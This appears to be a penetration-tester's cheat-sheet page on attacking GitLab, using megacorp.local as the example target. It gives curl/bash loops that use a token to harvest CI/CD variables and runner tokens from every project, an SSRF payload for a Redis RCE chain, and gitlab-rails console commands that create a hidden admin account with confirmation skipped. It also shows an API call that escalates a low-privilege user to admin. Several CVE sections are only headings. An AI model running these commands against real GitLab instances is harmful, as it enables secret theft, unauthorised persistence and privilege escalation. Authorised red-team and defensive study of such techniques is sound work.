# GitLab * * * ## Search for Secrets * * Search for CI/CD variables and runner tokens: ```bash TOKEN=`cat token` GITLAB=gitlab.megacorp.local API="https://$GITLAB/api/v4" curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq # 1. bash get_project_ids.sh | tee -a projects curl -sH "Authorization: Bearer $TOKEN" "$API/groups//projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id' # 2. bash get_secrets.sh for id in `cat projects`; do curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path' curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq .runners_token | jq done ``` Search for credential leaks with [gitleaks](https://github.com/zricethezav/gitleaks): ``` $ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks $ TMPFILE=`mktemp`; ./gitleaks detect -s . -v -r $TMPFILE > /dev/null; cat $TMPFILE | jq; rm $TMPFILE ``` ## GitLab Runners Abuse * * ## SSRF > Redis > RCE (CE/EE) **CVE-2018-19571, CVE-2018-19585** * * * Also possible to use this payload (instead of IPv6) to bypass filter checks for localhost, but works only with `git://` scheme: ``` git://127.0.0.1:6379/%0a ``` ## Path Traversal > LFI > RCE (CE/EE) **CVE-2020-10977** * * ## Path Traversal > File Write > RCE (EE) **CVE-2019-19088** * ## gitlab-rails * Add new admin user from console: ```ruby $ sudo gitlab-rails console irb(main):001:0 > ActiveRecord::Base.logger = Logger.new($stdout) irb(main):002:0 > User.find(1) => # irb(main):003:0 > user = User.create(:username => 'snovvcrash', :password => 'Passw0rd!', :password_confirmation => 'Passw0rd!', :admin => true, :name => 'snovvcrash', :email => 'snovvcrash@megacorp.local') irb(main):004:0 > user.save! irb(main):005:0 > user.confirmation_token => "ZVrM4KsyEdSoTJvo8kx_" ``` Then activate the account by navigating to `https://gitlab.megacorp.local/users/confirmation?confirmation_token=ZVrM4KsyEdSoTJvo8kx_`. Or just skip the verification: ```ruby irb(main):003:0 > user.skip_confirmation! irb(main):004:0 > user.save! ``` Also for GitLab >= 16.11 personal space assignment is required: ```ruby irb(main):003:0 > user.assign_personal_namespace(Organizations::Organization.default_organization) irb(main):004:0 > user.save! ``` Enable password authentication for web (e. g., when only LDAP authentication is available): ```ruby $ sudo gitlab-rails console irb(main):001:0 > Gitlab::CurrentSettings.update!(password_authentication_enabled_for_web: true) irb(main):002:0 > exit $ sudo gitlab-ctl reconfigure ``` Grant a low-priv user admin's privileges via API: ```bash # Check token priveleges $ curl -sX GET -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/user" | jq '.is_admin' # Grant low-priv user admin's privileges $ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=true" | jq '.is_admin' # Revert low-priv user's original privileges $ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=false" | jq '.is_admin' ``` ## Arbitrary File Read **CVE-2023-2825** * *